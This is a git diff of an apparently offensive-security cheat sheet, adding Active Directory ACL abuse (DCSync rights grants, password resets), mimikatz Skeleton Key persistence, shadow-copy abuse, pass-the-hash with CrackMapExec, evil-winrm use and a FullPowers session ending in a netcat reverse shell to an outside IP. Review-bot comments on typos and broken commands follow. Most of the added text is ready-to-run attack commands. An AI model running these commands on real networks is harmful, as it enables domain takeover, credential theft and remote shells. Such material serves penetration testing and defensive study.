diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index ce4d6d8..489fcd1 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -46,6 +46,9 @@ - [Ghost Potato - CVE-2019-1384](#ghost-potato---cve-2019-1384) - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) - [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces) + - [GenericAll](#genericall) + - [GenericWrite](#genericwrite) + - [WriteDACL](#writedacl) - [Trust relationship between domains](#trust-relationship-between-domains) - [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking) - [Kerberos Unconstrained Delegation](#kerberos-unconstrained-delegation) 
@@ -71,38 +74,50 @@ * [BloodHound](https://github.com/BloodHoundAD/BloodHound) ```powershell - apt install bloodhound #kali - neo4j console + # start BloodHound and the database + root@payload$ apt install bloodhound #kali + root@payload$ neo4j console + root@payload$ ./bloodhound Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j - ./bloodhound - SharpHound.exe (from resources/Ingestor) - SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100 - SharpHound.exe -c all -d active.htb --LdapUser myuser --LdapPass mypass --domaincontroller 10.10.10.100 - SharpHound.exe -c all -d active.htb -SearchForest - SharpHound.exe --EncryptZip --ZipFilename export.zip - or + + # run the ingestor on the machine using SharpHound.exe + # https://github.com/BloodHoundAD/SharpHound3 + .\SharpHound.exe (from resources/Ingestor) + .\SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100 + .\SharpHound.exe -c all -d active.htb --LdapUser myuser --LdapPass mypass --domaincontroller 10.10.10.100 + .\SharpHound.exe -c all -d active.htb -SearchForest + .\SharpHound.exe --EncryptZip --ZipFilename export.zip + .\SharpHound.exe --CollectionMethod All --LDAPUser --LDAPPass --JSONFolder + + # or run the ingestor on the machine using Powershell + # https://github.com/BloodHoundAD/BloodHound/tree/master/Ingestors Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public - or + Invoke-BloodHound -CollectionMethod All -LDAPUser -LDAPPass -OutputDirectory + + # or remotely via BloodHound Python + # https://github.com/fox-it/BloodHound.py bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all ``` * [AdExplorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer) * [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec) - ```bash - apt-get install -y libssl-dev libffi-dev python-dev build-essential - git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec - crackmapexec smb -L - 
crackmapexec smb -M name_module -o VAR=DATA - crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --local-auth - crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --shares - crackmapexec 192.168.1.100 -u Administrator -H ':5858d47a41e40b40f294b3100bea611f' -d 'DOMAIN' -M invoke_sessiongopher - crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable - crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443 - crackmapexec 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload" - crackmapexec 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami' - crackmapexec smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M mimikatz - crackmapexec mimikatz --server http --server-port 80 + ```powershell + # use the latest release, CME is now a binary packaged will all its dependencies + root@payload$ wget https://github.com/byt3bl33d3r/CrackMapExec/releases/download/v5.0.1dev/cme-ubuntu-latest.zip + + # execute cme (smb, winrm, mssql, ...) 
+ root@payload$ cme smb -L + root@payload$ cme smb -M name_module -o VAR=DATA + root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --local-auth + root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --shares + root@payload$ cme smb 192.168.1.100 -u Administrator -H ':5858d47a41e40b40f294b3100bea611f' -d 'DOMAIN' -M invoke_sessiongopher + root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable + root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443 + root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload" + root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami' + root@payload$ cme smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M mimikatz + root@payload$ cme mimikatz --server http --server-port 80 ``` * [Mitm6](https://github.com/fox-it/mitm6.git) 
@@ -1026,24 +1041,59 @@ Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccount ### Abusing Active Directory ACLs/ACEs -* **GenericAll on User** : We can reset user's password without knowing the current password -* **GenericAll on Group** : Effectively, this allows us to add ourselves (the user spotless) to the Domain Admin group : `net group "domain admins" spotless /add /domain` -* **WriteProperty on Group** : We can again add ourselves to the Domain Admins group and escalate privileges: `net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain` -* **Self (Self-Membership) on Group** : Another privilege that enables the attacker adding themselves to a group -* **ForceChangePassword** : we can reset the user's password without knowing their current password: `$c = Get-Credential;Set-DomainUserPassword -Identity changeme -AccountPassword $c.Password -Verbose` -* **GenericWrite on User** : WriteProperty on an ObjectType, which in this particular case is Script-Path, allows the attacker to overwrite the logon script path of the delegate user, which means that the next time, when the user delegate logs on, their system will execute our malicious script : `Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1` -* **WriteDACL** : It is possible to add any given account as a replication partner of the domain by applying the following extended rights Replicating Directory Changes/Replicating Directory Changes All. 
[Invoke-ACLPwn](https://github.com/fox-it/Invoke-ACLPwn) is a tool that automates the discovery and pwnage of ACLs in Active Directory that are unsafe configured : `./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -Username 'testuser' -Domain 'xenoflux.local' -Password 'Welcome01!'` - ```powershell - # give DCSync right to titi - Add-ObjectACL -TargetDistinguishedName "dc=dev,dc=testlab,dc=local" -PrincipalSamAccountName titi -Rights DCSync - ``` - Check ACL for an User with [ADACLScanner](https://github.com/canix1/ADACLScanner). ```powershell ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtree -EffectiveRightsPrincipal User1 -Output HTML -Show ``` +#### GenericAll + +* **GenericAll on User** : We can reset user's password without knowing the current password +* **GenericAll on Group** : Effectively, this allows us to add ourselves (the user spotless) to the Domain Admin group : `net group "domain admins" spotless /add /domain` + +GenericAll/GenericWrite we can set a SPN on a target account, request a TGS, then grab its hash and kerberoast it. 
+ +```powershell +# using PowerView +# Check for interesting permissions on accounts: +Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"} + +# Check if current user has already an SPN setted: +Get-DomainUser -Identity | select serviceprincipalname + +# Force set the SPN on the account: +Set-DomainObject -Set @{serviceprincipalname='ops/whatever1'} +``` + +#### GenericWrite + +* Reset another user's password + + ```powershell + # https://github.com/EmpireProject/Empire/blob/master/data/module_source/situational_awareness/network/powerview.ps1 + $user = 'DOMAIN\user1'; + $pass= ConvertTo-SecureString 'user1pwd' -AsPlainText -Force; + $creds = New-Object System.Management.Automation.PSCredential $user, $pass; + $newpass = ConvertTo-SecureString 'newsecretpass' -AsPlainText -Force; + Set-DomainUserPassword -Identity 'DOMAIN\user2' -AccountPassword $newpass -Credential $creds; + ``` + +* WriteProperty on an ObjectType, which in this particular case is Script-Path, allows the attacker to overwrite the logon script path of the delegate user, which means that the next time, when the user delegate logs on, their system will execute our malicious script : `Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1` + + +#### WriteDACL + +To abuse WriteDacl to a domain object, you may grant yourself the DcSync privileges. It is possible to add any given account as a replication partner of the domain by applying the following extended rights Replicating Directory Changes/Replicating Directory Changes All. 
[Invoke-ACLPwn](https://github.com/fox-it/Invoke-ACLPwn) is a tool that automates the discovery and pwnage of ACLs in Active Directory that are unsafe configured : `./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -Username 'user1' -Domain 'domain.local' -Password 'Welcome01!'` + +```powershell +# Give DCSync right to the principal identity +Import-Module .\PowerView.ps1 +$SecPassword = ConvertTo-SecureString 'user1pwd' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('DOMAIN.LOCAL\user1', $SecPassword) +Add-DomainObjectAcl -Credential $Cred -TargetIdentity 'DC=domain,DC=local' -Rights DCSync -PrincipalIdentity user2 -Verbose -Domain domain.local +``` + ### Trust relationship between domains @@ -1571,4 +1621,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 6b3723410a3c5 * [Escalating privileges with ACLs in Active Directory - April 26, 2018 - Rindert Kramer and Dirk-jan Mollema](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/) * [A Red Teamer’s Guide to GPOs and OUs - APRIL 2, 2018 - @_wald0](https://wald0.com/?p=179) * [Carlos Garcia - Rooted2019 - Pentesting Active Directory Forests public.pdf](https://www.dropbox.com/s/ilzjtlo0vbyu1u0/Carlos%20Garcia%20-%20Rooted2019%20-%20Pentesting%20Active%20Directory%20Forests%20public.pdf?dl=0) -* [Kerberosity Killed the Domain: An Offensive Kerberos Overview - Ryan Hausknecht - Mar 10](https://posts.specterops.io/kerberosity-killed-the-domain-an-offensive-kerberos-overview-eb04b1402c61) \ No newline at end of file +* [Kerberosity Killed the Domain: An Offensive Kerberos Overview - Ryan Hausknecht - Mar 10](https://posts.specterops.io/kerberosity-killed-the-domain-an-offensive-kerberos-overview-eb04b1402c61) +* [Active-Directory-Exploitation-Cheat-Sheet - @buftas](https://github.com/buftas/Active-Directory-Exploitation-Cheat-Sheet#local-privilege-escalation) \ No newline at end of file 
diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index 5f0b5ac..bd4ca44 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -17,6 +17,7 @@ * [Services](#services) * [Scheduled Task](#scheduled-task) * [RDP Backdoor](#rdp-backdoor) + * [Skeleton Key](#skeleton-key) * [References](#references) @@ -174,6 +175,15 @@ Hit F5 a bunch of times when you are at the RDP login screen. REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f ``` +### Skeleton Key + +```powershell +# Exploitation Command runned as DA: +Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName + +# Access using the password "mimikatz" +Enter-PSSession -ComputerName -Credential \Administrator +``` ## References diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index d4b05d6..c29fcbf 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md 
@@ -25,9 +25,11 @@ * [EoP - AlwaysInstallElevated](#eop---alwaysinstallelevated) * [EoP - Insecure GUI apps](#eop---insecure-gui-apps) * [EoP - Runas](#eop---runas) +* [EoP - Abusing Shadow Copies](#eop---abusing-shadow-copies) * [EoP - From local administrator to NT SYSTEM](#eop---from-local-administrator-to-nt-system) * [EoP - Living Off The Land Binaries and Scripts](#eop---living-off-the-land-binaries-and-scripts) * [EoP - Impersonation Privileges](#eop---impersonation-privileges) + * [Restore A Service Account's Privileges](#restore-a-service-accounts-privileges) * [Meterpreter getsystem and alternatives](#meterpreter-getsystem-and-alternatives) * [RottenPotato (Token Impersonation)](#rottenpotato-token-impersonation) * [Juicy Potato (abusing the golden privileges)](#juicy-potato-abusing-the-golden-privileges) @@ -718,6 +720,21 @@ $computer = "" [System.Diagnostics.Process]::Start("C:\users\public\nc.exe"," 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer) ``` +## EoP - Abusing Shadow Copies + +If you have local administrator access on a machine try to list shadow copies, it's an easy way for Privilege Escalation. + +```powershell +# List shadow copies using vssadmin (Needs Admnistrator Access) +vssadmin list shadows + +# List shadow copies using diskshadow +diskshadow list shadows all + +# Make a symlink to the shadow copy and access it +mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\ +``` + ## EoP - From local administrator to NT SYSTEM ```powershell @@ -758,6 +775,37 @@ Full privileges cheatsheet at https://github.com/gtworek/Priv2Admin, summary bel |`SeTakeOwnership`| ***Admin*** | ***Built-in commands*** |1. `takeown.exe /f "%windir%\system32"`
2. `icalcs.exe "%windir%\system32" /grant "%username%":F`
3. Rename cmd.exe to utilman.exe
4. Lock the console and press Win+U| Attack may be detected by some AV software.

Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. | |`SeTcb`| ***Admin*** | 3rd party tool | Manipulate tokens to have local admin rights included. May require SeImpersonate.

To be verified. || +### Restore A Service Account's Privileges + +> This tool should be executed as LOCAL SERVICE or NETWORK SERVICE only. + +```powershell +# https://github.com/itm4n/FullPowers + +c:\TOOLS>FullPowers +[+] Started dummy thread with id 9976 +[+] Successfully created scheduled task. +[+] Got new token! Privilege count: 7 +[+] CreateProcessAsUser() OK +Microsoft Windows [Version 10.0.19041.84] +(c) 2019 Microsoft Corporation. All rights reserved. + +C:\WINDOWS\system32>whoami /priv +PRIVILEGES INFORMATION +---------------------- +Privilege Name Description State +============================= ========================================= ======= +SeAssignPrimaryTokenPrivilege Replace a process level token Enabled +SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled +SeAuditPrivilege Generate security audits Enabled +SeChangeNotifyPrivilege Bypass traverse checking Enabled +SeImpersonatePrivilege Impersonate a client after authentication Enabled +SeCreateGlobalPrivilege Create global objects Enabled +SeIncreaseWorkingSetPrivilege Increase a process working set Enabled + +c:\TOOLS>FullPowers -c "C:\TOOLS\nc64.exe 1.2.3.4 1337 -e cmd" -z +``` + ### Meterpreter getsystem and alternatives @@ -794,7 +842,7 @@ Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -n ### Juicy Potato (abusing the golden privileges) Binary available at : https://github.com/ohpe/juicy-potato/releases -:warning: Juicy Potato doesn't work on Windows Server 2019 and Windows 10 1809. +:warning: Juicy Potato doesn't work on Windows Server 2019 and Windows 10 1809 +. 1. Check the privileges of the service account, you should look for **SeImpersonate** and/or **SeAssignPrimaryToken** (Impersonate a client after authentication) diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index cd27039..b1148a3 100644 --- a/Methodology and Resources/Windows - Using credentials.md 
+++ b/Methodology and Resources/Windows - Using credentials.md @@ -9,6 +9,8 @@ * [Metasploit](#metasploit) * [Metasploit - SMB](#metasploit-smb) * [Metasploit - Psexec](#metasploit-psexec) +* [Remote Code Execution with PS Credentials](#remote-code-execution-with-ps-credentials) +* [WinRM](#winrm) * [Crackmapexec](#crackmapexec) * [Winexe](#winexe) * [WMI](#wmi) @@ -99,6 +101,22 @@ python crackmapexec.py 10.10.10.10 -d DOMAIN -u username -p password -x whoami cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51' --local-auth ``` +## Remote Code Execution with PS Credentials + +```powershell +$SecPassword = ConvertTo-SecureString 'secretpassword' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\USERNAME', $SecPassword) +Invoke-Command -ComputerName DC01 -Credential $Cred -ScriptBlock {whoami} +``` + +## WinRM + +```powershell +root@payload$ git clone https://github.com/Hackplayers/evil-winrm +root@payload$ evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] +root@payload$ evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/' +``` + ## Winexe Integrated to Kali diff --git a/XSS Injection/Files/mouseover-xss-ecs.jpeg b/XSS Injection/Files/mouseover-xss-ecs.jpeg new file mode 100644 index 0000000..0f7053a Binary files /dev/null and b/XSS Injection/Files/mouseover-xss-ecs.jpeg differ diff --git a/XSS Injection/Files/onclick-xss-ecs.jpeg b/XSS Injection/Files/onclick-xss-ecs.jpeg new file mode 100644 index 0000000..ccd2d0f Binary files /dev/null and b/XSS Injection/Files/onclick-xss-ecs.jpeg differ
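Review bot: In the `@@ -71,38 +74,50 @@` hunk of Active Directory Attack.md, the line `.\SharpHound.exe --CollectionMethod All --LDAPUser --LDAPPass --JSONFolder` passes three options with no values and will error out as written; either give them placeholders (`--LDAPUser <user> --LDAPPass <pass> --JSONFolder <dir>`) or drop the line, since the `-c all ... --LdapUser myuser --LdapPass mypass` line above already shows authenticated collection. The same applies to `Invoke-BloodHound -CollectionMethod All -LDAPUser -LDAPPass -OutputDirectory`. Two smaller points: the comment "CME is now a binary packaged will all its dependencies" should read "with all", and it sits next to a `wget` pinned to `v5.0.1dev`, which contradicts the "use the latest release" advice (point readers at the releases page instead of one dev build). The CrackMapExec fence was changed from `bash` to `powershell`, but every line in it is a `root@payload$` Linux shell command, so `bash` remains the right tag.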
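Review bot: In the `@@ -1026,24 +1041,59 @@` hunk, the restructuring into GenericAll/GenericWrite/WriteDACL subsections silently drops three bullets from the old list, `WriteProperty on Group`, `Self (Self-Membership) on Group` and `ForceChangePassword`, and no new subsection covers them; please keep them (their own heading or under GenericWrite) so the cheat sheet does not lose content. Relatedly, the new "Reset another user's password" item is filed under GenericWrite, while the removed list attributed password reset to `GenericAll on User` and `ForceChangePassword`; it should move back under one of those, since write-property rights alone are not the extended right the old bullet described. In the PowerView block, `?{$_.IdentinyReferenceName -match "RDPUsers"}` has a typo for `IdentityReferenceName` and will match nothing, `Get-DomainUser -Identity | select serviceprincipalname` and `Set-DomainObject -Set @{serviceprincipalname='ops/whatever1'}` both lack an identity argument (add `-Identity <user>` placeholders), and "setted" should be "set". The carried-over `-PropertyValue "\\10.0.0.5\totallyLegitScript.ps1` is still missing its closing quote.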
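Review bot: In the Skeleton Key hunk (`@@ -174,6 +175,15 @@` of Windows - Persistence.md), `-ComputerName` on the `Invoke-Mimikatz` line and `-ComputerName -Credential \Administrator` on the `Enter-PSSession` line have no values, so the snippet cannot be run as shown; use explicit placeholders such as `-ComputerName <DC>` and `-Credential <DOMAIN>\Administrator`, and say in the comment that the target is a domain controller, which "runned as DA" only implies. "runned" should be "run".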
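Review bot: In the Shadow Copies hunk (`@@ -718,6 +720,21 @@` of Windows - Privilege Escalation.md), two of the three commands do not work as written inside a `powershell` fence: `mklink` is a cmd.exe built-in, so it needs `cmd /c mklink /d ...` from PowerShell (or the fence should be `cmd`), and `diskshadow` does not take commands as arguments, it reads them interactively or from a script via `diskshadow /s <file>`, so `diskshadow list shadows all` fails. The intro sentence also never says why listing shadow copies matters; one clause noting that the symlink exposes a point-in-time copy of the volume's files would make the section self-explanatory. "Admnistrator" should be "Administrator".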
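Review bot: In the FullPowers hunk (`@@ -758,6 +775,37 @@`), the added section consists of a quoted warning and a raw session transcript but no sentence saying what the tool does; a one-liner stating that it recovers the default privilege set of the LOCAL SERVICE / NETWORK SERVICE account (the transcript's "Successfully created scheduled task" and "Got new token! Privilege count: 7" lines are otherwise unexplained) plus a link to the README would help. While touching this table, the unchanged context row still has `icalcs.exe "%windir%\system32" /grant ...`, which should be `icacls.exe`.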
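Review bot: The `@@ -794,7 +842,7 @@` hunk looks like an accidental edit: it splits `:warning: Juicy Potato doesn't work on Windows Server 2019 and Windows 10 1809.` into `... Windows 10 1809` followed by a lone `.` on its own line, which renders as a stray period paragraph. Revert to the original single line.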
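Review bot: In the WinRM hunk (`@@ -99,6 +101,22 @@` of Windows - Using credentials.md), the block clones the repository and then invokes `evil-winrm` on one line and `evil-winrm.rb` on the next; after a `git clone` the entry point is `ruby evil-winrm.rb`, and the bare `evil-winrm` command only exists on PATH after `gem install evil-winrm`, so pick one install method and use the matching command on both lines. As in the CME block, these `root@payload$` lines are Linux shell, not PowerShell, so the fence should be `bash`.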